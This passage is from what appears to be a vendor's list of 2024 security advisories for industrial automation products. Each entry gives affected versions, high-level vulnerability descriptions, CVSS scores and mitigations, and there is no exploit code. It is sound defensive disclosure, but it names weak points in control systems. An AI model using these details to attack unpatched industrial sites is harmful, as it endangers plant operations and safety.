Known Exploited Vulnerability (KEV) database: No

CVE-2024-7956 IMPACT

A vulnerability exists in the affected products that allows a threat actor to gain access to user’s projects. To exploit this vulnerability the threat actor must have basic user privileges. If exploited, the threat actor can modify and delete the project.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 7.6
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

High

SD1701 | RSLogix™ 5 and RSLogix 500® Remote Code Execution Via VBA Embedded Script

Published Date:

September 16, 2024

Last Updated:

October 14, 2024

CVE IDs:

CVE-2024-7847

CVSS Scores (v3.1):

7.7

CVSS Scores (v4.0):

8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Published Date: September 19, 2024

Last updated: September 19, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 8.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected software version	Corrected in software version
RSLogix 500®	All	n/a
RSLogix™ Micro Developer and Starter	All	n/a
RSLogix™ 5	All	n/a

Mitigations and Workarounds

Users using the affected software are encouraged to apply the following mitigations and security best practices, where possible.

· Deny the execution feature in FactoryTalk® Administration Console, when not needed, by navigating to “Policies”, selecting ‘”Enable/Disable VBA”, and then checking the “Deny” box to block VBA code execution.

· Save project files in a Trusted® location where only administrators can modify it and verify file integrity.

· Utilize the VBA editor protection feature, which locks the VBA code from viewing and editing by setting a password.

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported to us by Sharon Brizinov of Claroty Research - Team82.

A feature in the affected products enables users to prepare a project file with an embedded VBA script and can be configured to run once the project file has been opened without user intervention. This feature can be abused to trick a legitimate user into executing malicious code upon opening an infected RSP/RSS project file. If exploited, a threat actor may be able to perform a remote code execution. Connected devices may also be impacted by exploitation of this vulnerability.

CVE-2024-7847 IMPACT

CVSS Base Score 3.1: 7.7/10

CVSS Vector String 3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS Base Score 4.0: 8.8/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-345 (Insufficient verification of data authenticity)

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-7847

High

SD1699 | 5015-U8IHFT Denial-of-Service Vulnerability via CIP Message

Published Date:

September 12, 2024

Last Updated:

November 11, 2024

CVE IDs:

CVE-2024-45825

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Versions	Corrected in Software Version
5015-U8IHFT	V1.011 and V1.012	V2.011

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45825 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Block communication to CIP class 883 if it is not required

· Block communication to CIP class 67 if it is not required

· Enforce proper network segmentation and routing controls

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· JSON CVE-2024-45825

Critical

SD1698 | FactoryTalk® Batch View™ Authentication Bypass Vulnerability via shared secrets

Published Date:

September 12, 2024

Last Updated:

November 11, 2024

CVE IDs:

CVE-2024-45823

CVSS Scores (v3.1):

8.1

CVSS Scores (v4.0):

9.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 8.1/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Versions	Corrected in Software Version
FactoryTalk® Batch View™	2.01.00	3.00.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45823 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· JSON CVE-2024-45823

High

SD1700 | ThinManager® Code Execution Vulnerability

Published Date:

September 12, 2024

Last Updated:

November 11, 2024

CVE IDs:

CVE-2024-45826

CVSS Scores (v3.1):

6.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 6.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Versions

Corrected in Software Version

ThinManager®

V13.1.0 - 13.1.2

V13.2.0 - 13.2.1

V13.1.3

V13.2.2

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45826 IMPACT

Due to improper input validation, a path traversal and remote code execution vulnerability exists when the ThinManager® processes a crafted POST request. If exploited, a user can install an executable file.

CVSS 3.1 Base Score: 6.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· JSON CVE-2024-45826

High

SD1697 | AADvance® Trusted® SIS Workstation contains multiple 7-ZIP Vulnerabilities

Published Date:

September 12, 2024

Last Updated:

November 11, 2024

CVE IDs:

CVE-2023-31102, CVE-2023-40481

CVSS Scores (v3.1):

7.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Versions	Corrected in Software Version
AADvance® Trusted® SIS Workstation	2.00.01 and earlier	2.00.02

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-31102 IMPACT

A vulnerability exists which could allow remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is required to exploit this vulnerability because the target must visit a malicious page or open a malicious file.

The specific vulnerability exists in the analysis of 7Z files. The problem results from the lack of proper validation of user-supplied data, which can lead to an integer underflow before writing to memory. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2023-40481 IMPACT

A SquashFS File Parsing Out-Of-Bounds Write Remote Code Execution exists in 7-Zip that allows remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is also required to exploit this vulnerability, as the target must visit a malicious page or open a malicious file.

The specific vulnerability arises during the analysis of SQFS files due to the lack of proper validation of user-supplied data. This can cause a write operation to exceed the end of an allocated buffer. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Do not archive or restore projects from unknown sources.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· JSON CVE-2023-31102

· JSON CVE-2023-40481

Critical

SD1696 | FactoryTalk® View Site Edition Remote Code Execution Vulnerability via Lack of Input Validation

Published Date:

September 12, 2024

Last Updated:

November 13, 2024

CVE IDs:

CVE-2024-45824

CVSS Scores (v3.1):

9.8

CVSS Scores (v4.0):

9.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Versions	Corrected in Software Version
FactoryTalk® View Site Edition	V12.0, V13.0, V14.0	Patches available here

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45824 IMPACT

A remote code vulnerability exists in the affected products. The vulnerability occurs when chained with Path Traversal, Command Injection, and XSS Vulnerabilities and allows for full unauthenticated remote code execution. The link in the mitigations section below contains patches to fix this issue.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-77: Improper Neutralization of Special Elements used in a Command
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Navigate to the following link and apply patches, directions are on the link page

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

· JSON CVE-2024-45824

High

SD1695 | Incorrect Privileges and Path Traversal Vulnerability in Pavilion8®

Published Date:

September 11, 2024

Last Updated:

October 16, 2024

CVE IDs:

CVE-2024-7960 , CVE-2024-7961

CVSS Scores (v3.1):

7.6, 7.2

CVSS Scores (v4.0):

8.8, 8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/24
Revision Number: 1.0
CVSS Score: 3.1: 7.6, 7.2 4.0: 8.8, 7.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Version	Corrected in Software Version
Pavilion8®	<V5.20	V6.0 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the vulnerabilities.

CVE-2024-7960 IMPACT

The affected product contains a vulnerability that allows a threat actor to view sensitive information and change settings. The vulnerability exists due to having an incorrect privilege matrix that allows users to have access to functions they should not.

CVSS 3.1 Base Score: 7.6
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

CVSS 4.0 Base Score: 8.8
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

CWE: Improper Privilege Management
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7961 IMPACT

A path traversal vulnerability exists in the affected product. If exploited, the threat actor could upload arbitrary files to the server that could result in a remote code execution.

CVSS 3.1 Base Score: 7.2
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CVE-2024-7960 JSON

CVE-2024-7961 JSON

High

SD1694 | OptixPanel™ Privilege Escalation Vulnerability via File Permissions

Published Date:

September 10, 2024

Last Updated:

November 13, 2024

CVE IDs:

CVE-2024-8533

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

7.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 9/12/2024

Last Updated: 9/12/2024

Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

2800C OptixPanel™ Compact

4.0.0.325

4.0.2.116

2800S OptixPanel™ Standard

4.0.0.350

4.0.2.123

Embedded Edge Compute Module

4.0.0.347

4.0.2.106

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-8533 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing users to exfiltrate credentials and escalate privileges.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.7
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

JSON CVE-2024-8533

High

SD1693 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Vulnerable to DoS vulnerability via CIP

Published Date:

September 10, 2024

Last Updated:

November 13, 2024

CVE IDs:

CVE-2024-6077

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: 9/12/2024

Updated Date: 9/12/2024

Revision Number: 1.0

CVSS: v3.1: 7.4, 4.0: 8.3

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Family

First Known in Software/Firmware Version

Corrected in Software/Firmware Version

CompactLogix 5380

v.32 .011

v33.017, v34.014, v35.013, v36.011 and later

CompactLogix 5380 Process

v.33.011

v33.017, v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL 2

v.32.013

v33.017, v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL 3

v.32.011

v33.017, v34.014, v35.013, v36.011 and later

CompactLogix 5480

v.32.011

v33.017, v34.014, v35.013, v36.011 and later

ControlLogix® 5580

v.32.011

v33.017, v34.014, v35.013, v36.011 and later

ControlLogix® 5580 Process

v.33.011

v33.017, v34.014, v35.013, v36.011 and later

GuardLogix 5580

v.32.011

v33.017, v34.014, v35.013, v36.011 and later

1756-EN4

v2.001

v6.001 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6077 IMPACT

A denial-of-service vulnerability exists in the affected products when specially crafted packets are sent to the CIP Security Object. If exploited the device will become unavailable and require a factory reset to recover.

CVSS Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers who are unable to upgrade to the corrected software versions are encouraged to apply the following risk mitigations.

Users who do not wish to use CIP security can disable the feature per device. See "Disable CIP Security" in Chapter 2 of "CIP Security with Rockwell Automation Products" (publication SECURE-AT001)

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

JSON CVE-2024-6077

Critical

SD1692 | ThinManager® ThinServer™ Information Disclosure and Remote Code Execution Vulnerabilities

Published Date:

August 21, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2024-7986, CVE 2024-7987, CVE 2024 -7988

CVSS Scores (v3.1):

5.5, 7.8, 9.8

CVSS Scores (v4.0):

6.8, 8.5, 9.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 8/22/24

Last updated: 8/22/24

Revision Number: 1.0

CVSS Score: v3.1: 5.5, 7.8, 9.8, v4.0: 6.8, 8.5, 9.3

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

ThinManager® ThinServer™

11.1.0-11.1.7
11.2.0-11.2.8
12.0.0-12.0.6
12.1.0-12.1.7
13.0.0-13.0.4
13.1.0-13.1.2
13.2.0-13.2.1

11.1.8

11.2.9

12.0.7

12.1.8

13.0.5

13.1.3

13.2.2

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Nicholas Zubrisky of Trend Micro Security Research.

CVE-2024-7986 IMPACT

A vulnerability exists in the affected products that allows a threat actor to disclose sensitive information. A threat actor can exploit this vulnerability by abusing the ThinServer™ service to read arbitrary files by creating a junction that points to the target directory.

CVSS Base Score v3.1: 5.5/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS Base Score v4.0: 6.8/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

CVE-2024-7987 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. To exploit this vulnerability and a threat actor must abuse the ThinServer™ service by creating a junction and use it to upload arbitrary files.

CVSS Base Score v3.1: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource

CVE-2024-7988 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.

CVSS Base Score v3.1: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Mitigations and Workarounds

Customers using the affected software are encouraged to implement our suggested security best practices to minimize the risk of vulnerability.

· Security Best Practices

ADDITIONAL RESOURCES

· JSON CVE-2024-7986

· JSON CVE 2024-7987

· JSON CVE 2024 -7988

High

SD1689 | AADvance® Standalone OPC-DA Server Code Execution Vulnerability via Vulnerable Component

Published Date:

August 13, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2018-1285, CVE-2006-0743

CVSS Scores (v3.1):

7.5, 5.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: August 13, 2024
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: Please see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
AADvance® Standalone OPC-DA Server	v2.01.510	v2.02 and later

VULNERABILITY DETAILS

CVE IMPACT

An arbitrary code execution vulnerability exists in the affected product. The vulnerability occurs due to a vulnerable component, Log4Net v1.2, which has multiple vulnerabilities listed below:

CVE-2018-1285, CVSS score 7.5 - log4net config file does not disable XML external entities
- CVSS Base Score: 7.5
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- CWE-20: Improper Input Validation
- Known Exploited Vulnerability (KEV) database: None
CVE-2006-0743, CVSS score 5.3 - format string vulnerability in log4net
- CVSS Base Score: 5.3
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
- CWE-134: Use of Externally Controlled Format String
- Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2006-0743

JSON CVE-2018-1285

High

SD1687 | Authentication Bypass Vulnerability in DataMosaix™

Published Date:

August 13, 2024

Last Updated:

November 20, 2024

CVE IDs:

CVE-2024-6078

CVSS Scores (v3.1):

9.1

CVSS Scores (v4.0):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: 8/13/2024

Updated Date: 8/13/2024
Revision Number: 1.0

CVSS: v3.1: 9.1, v4.0: 8.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
DataMosaix™ Private Cloud	V7.07 <	v7.09 or later

Mitigations and Workarounds

Customers using the affected software are encouraged to upgrade the DataMosaix™ Private Cloud software from V7.07 to V7.09. The application support team will work with respective customers to upgrade.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAIL

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6078 IMPACT

An improper authentication vulnerability exists in the affected product, which could allow a malicious user to generate cookies for any user ID without the use of a username or password. If exploited, a malicious user could take over the account of a legitimate user. The malicious user would be able to view and modify data stored in the cloud.

CVSS Base Score: 9.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS Base Score: 8.6
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

JSON CVE-2024-6078

High

SD1685 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Controller Denial-of-Service Vulnerability via Input Validation

Published Date:

August 13, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2024-7507

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: August 13, 2024
Last updated: September 13, 2024

Revision Number: 2.0

September 14, 2024 - Upated Affected Product and Solutions Table

CVSS Score: v3.1 7.5/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware Version

Corrected in Firmware Version

CompactLogix 5380

v28.011

v34.014, v35.013, v36.011 and later

ControlLogix 5580

v28.011

v34.014, v35.013, v36.011 and later

GuardLogix 5580

v31.011

v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL2

v31.011

v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL3

V32.013

v34.014, v35.013, v36.011 and later

CompactLogix 5480

V32.011

v34.014, v35.013, v36.011 and later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

Restrict communication to CIP object 103 (0x67)

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7507 IMPACT

A denial-of-service vulnerability exists in the affected products. This vulnerability occurs when a malformed PCCC message is received, causing a fault in the controller.

CVSS 3.1 Base Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: None

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-7507

High

SD1688 | FactoryTalk® View Site Edition Code Execution Vulnerability via File Permissions

Published Date:

August 13, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2024-7513

CVSS Scores (v3.1):

8.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: 8/13/2024
